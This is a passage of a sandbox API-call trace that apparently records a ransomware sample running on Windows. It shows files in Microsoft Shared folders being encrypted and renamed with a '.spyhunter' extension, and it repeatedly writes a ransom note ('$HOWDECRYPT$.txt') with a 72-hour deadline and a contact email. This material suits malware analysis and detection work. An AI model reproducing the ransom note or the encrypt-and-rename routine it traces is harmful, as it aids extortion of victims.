(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0085.395] WriteFile (in: hFile=0xd0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff28, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff28*=0x2ac, lpOverlapped=0x0) returned 1 [0085.395] CloseHandle (hObject=0xd0) returned 1 [0085.395] GetProcessHeap () returned 0x2c0000 [0085.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3272b0 | out: hHeap=0x2c0000) returned 1 [0085.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfec8 | out: pbBuffer=0x25cfec8) returned 1 [0085.395] GetProcessHeap () returned 0x2c0000 [0085.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0085.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfec0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfec0*=0x30) returned 1 [0085.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0085.601] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 81 [0085.601] StrStrW (lpFirst="eqnedt32.exe.manifest", lpSrch=".txt") returned 0x0 [0085.601] GetProcessHeap () returned 0x2c0000 [0085.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x35f878 [0085.601] ReadFile (in: hFile=0xb4, lpBuffer=0x35f878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfe84, lpOverlapped=0x0 | out: lpBuffer=0x35f878*, lpNumberOfBytesRead=0x25cfe84*=0x236, lpOverlapped=0x0) returned 1 [0085.602] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.603] WriteFile (in: hFile=0xb4, lpBuffer=0x35f878*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x25cfe84, lpOverlapped=0x0 | out: lpBuffer=0x35f878*, lpNumberOfBytesWritten=0x25cfe84*=0x236, lpOverlapped=0x0) returned 1 [0085.603] GetProcessHeap () returned 0x2c0000 [0085.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0085.603] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.603] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfec4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfe84, lpOverlapped=0x0 | out: lpBuffer=0x25cfec4*, lpNumberOfBytesWritten=0x25cfe84*=0x4, lpOverlapped=0x0) returned 1 [0085.603] WriteFile (in: hFile=0xb4, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfe84, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfe84*=0x30, lpOverlapped=0x0) returned 1 [0085.603] CloseHandle (hObject=0xb4) returned 1 [0085.624] GetProcessHeap () returned 0x2c0000 [0085.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0085.624] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.spyhunter") returned 91 [0085.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.spyhunter")) returned 1 [0085.630] GetProcessHeap () returned 0x2c0000 [0085.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0085.630] GetProcessHeap () returned 0x2c0000 [0085.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0085.630] GetProcessHeap () returned 0x2c0000 [0085.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328918 | out: hHeap=0x2c0000) returned 1 [0085.630] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfec0 | out: pbBuffer=0x25cfec0) returned 1 [0085.630] GetProcessHeap () returned 0x2c0000 [0085.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0085.630] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfeb8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfeb8*=0x30) returned 1 [0085.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0085.765] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 70 [0085.765] StrStrW (lpFirst="odffilt.dll", lpSrch=".txt") returned 0x0 [0085.765] GetProcessHeap () returned 0x2c0000 [0085.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x33efe8 [0085.766] ReadFile (in: hFile=0x15c, lpBuffer=0x33efe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfe7c, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesRead=0x25cfe7c*=0x2800, lpOverlapped=0x0) returned 1 [0086.051] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.051] WriteFile (in: hFile=0x15c, lpBuffer=0x33efe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfe7c, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesWritten=0x25cfe7c*=0x2800, lpOverlapped=0x0) returned 1 [0086.051] GetProcessHeap () returned 0x2c0000 [0086.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0086.051] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.051] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfebc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfe7c, lpOverlapped=0x0 | out: lpBuffer=0x25cfebc*, lpNumberOfBytesWritten=0x25cfe7c*=0x4, lpOverlapped=0x0) returned 1 [0086.307] WriteFile (in: hFile=0x15c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfe7c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfe7c*=0x30, lpOverlapped=0x0) returned 1 [0086.307] CloseHandle (hObject=0x15c) returned 1 [0086.484] GetProcessHeap () returned 0x2c0000 [0086.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387080 [0086.485] wnsprintfW (in: pszDest=0x387080, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.spyhunter") returned 80 [0086.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.spyhunter")) returned 1 [0086.485] GetProcessHeap () returned 0x2c0000 [0086.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x387080 | out: hHeap=0x2c0000) returned 1 [0086.485] GetProcessHeap () returned 0x2c0000 [0086.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0086.485] GetProcessHeap () returned 0x2c0000 [0086.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324488 | out: hHeap=0x2c0000) returned 1 [0086.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0086.486] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.486] WriteFile (in: hFile=0x164, lpBuffer=0x25cfdf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff1c, lpOverlapped=0x0 | out: lpBuffer=0x25cfdf3*, lpNumberOfBytesWritten=0x25cff1c*=0x127, lpOverlapped=0x0) returned 1 [0086.486] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.487] WriteFile (in: hFile=0x164, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff1c*=0x2ac, lpOverlapped=0x0) returned 1 [0086.487] CloseHandle (hObject=0x164) returned 1 [0086.487] GetProcessHeap () returned 0x2c0000 [0086.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372a40 | out: hHeap=0x2c0000) returned 1 [0086.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfeb8 | out: pbBuffer=0x25cfeb8) returned 1 [0086.487] GetProcessHeap () returned 0x2c0000 [0086.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0086.487] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfeb0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfeb0*=0x30) returned 1 [0086.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.844] GetProcessHeap () returned 0x2c0000 [0086.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0086.844] GetProcessHeap () returned 0x2c0000 [0086.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372958 | out: hHeap=0x2c0000) returned 1 [0086.844] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0086.875] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.875] WriteFile (in: hFile=0x164, lpBuffer=0x25cfdeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff14, lpOverlapped=0x0 | out: lpBuffer=0x25cfdeb*, lpNumberOfBytesWritten=0x25cff14*=0x127, lpOverlapped=0x0) returned 1 [0086.875] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.875] WriteFile (in: hFile=0x164, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff14*=0x2ac, lpOverlapped=0x0) returned 1 [0086.876] CloseHandle (hObject=0x164) returned 1 [0086.876] GetProcessHeap () returned 0x2c0000 [0086.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x370c98 | out: hHeap=0x2c0000) returned 1 [0086.876] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfeb0 | out: pbBuffer=0x25cfeb0) returned 1 [0086.876] GetProcessHeap () returned 0x2c0000 [0086.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.876] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfea8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfea8*=0x30) returned 1 [0086.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.936] GetProcessHeap () returned 0x2c0000 [0086.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.936] GetProcessHeap () returned 0x2c0000 [0086.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354338 | out: hHeap=0x2c0000) returned 1 [0086.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfeb0 | out: pbBuffer=0x25cfeb0) returned 1 [0086.937] GetProcessHeap () returned 0x2c0000 [0086.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.937] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfea8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfea8*=0x30) returned 1 [0086.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.937] GetProcessHeap () returned 0x2c0000 [0086.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.937] GetProcessHeap () returned 0x2c0000 [0086.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x359580 | out: hHeap=0x2c0000) returned 1 [0086.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.937] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.937] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfddf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff08, lpOverlapped=0x0 | out: lpBuffer=0x25cfddf*, lpNumberOfBytesWritten=0x25cff08*=0x127, lpOverlapped=0x0) returned 1 [0086.938] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.938] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff08*=0x2ac, lpOverlapped=0x0) returned 1 [0086.938] CloseHandle (hObject=0x15c) returned 1 [0086.939] GetProcessHeap () returned 0x2c0000 [0086.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373268 | out: hHeap=0x2c0000) returned 1 [0086.939] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfea8 | out: pbBuffer=0x25cfea8) returned 1 [0086.939] GetProcessHeap () returned 0x2c0000 [0086.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.939] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfea0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfea0*=0x30) returned 1 [0086.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.946] GetProcessHeap () returned 0x2c0000 [0086.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.946] GetProcessHeap () returned 0x2c0000 [0086.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373180 | out: hHeap=0x2c0000) returned 1 [0086.946] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfea0 | out: pbBuffer=0x25cfea0) returned 1 [0086.946] GetProcessHeap () returned 0x2c0000 [0086.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.947] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe98*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe98*=0x30) returned 1 [0086.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.973] GetProcessHeap () returned 0x2c0000 [0086.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.973] GetProcessHeap () returned 0x2c0000 [0086.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x359240 | out: hHeap=0x2c0000) returned 1 [0086.973] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfea0 | out: pbBuffer=0x25cfea0) returned 1 [0086.973] GetProcessHeap () returned 0x2c0000 [0086.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe98*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe98*=0x30) returned 1 [0086.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.045] GetProcessHeap () returned 0x2c0000 [0087.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.045] GetProcessHeap () returned 0x2c0000 [0087.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358fd0 | out: hHeap=0x2c0000) returned 1 [0087.045] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe98 | out: pbBuffer=0x25cfe98) returned 1 [0087.045] GetProcessHeap () returned 0x2c0000 [0087.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.045] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfe90*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfe90*=0x30) returned 1 [0087.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.096] GetProcessHeap () returned 0x2c0000 [0087.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0087.096] GetProcessHeap () returned 0x2c0000 [0087.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372ec8 | out: hHeap=0x2c0000) returned 1 [0087.096] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfe98 | out: pbBuffer=0x25cfe98) returned 1 [0087.096] GetProcessHeap () returned 0x2c0000 [0087.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0087.096] 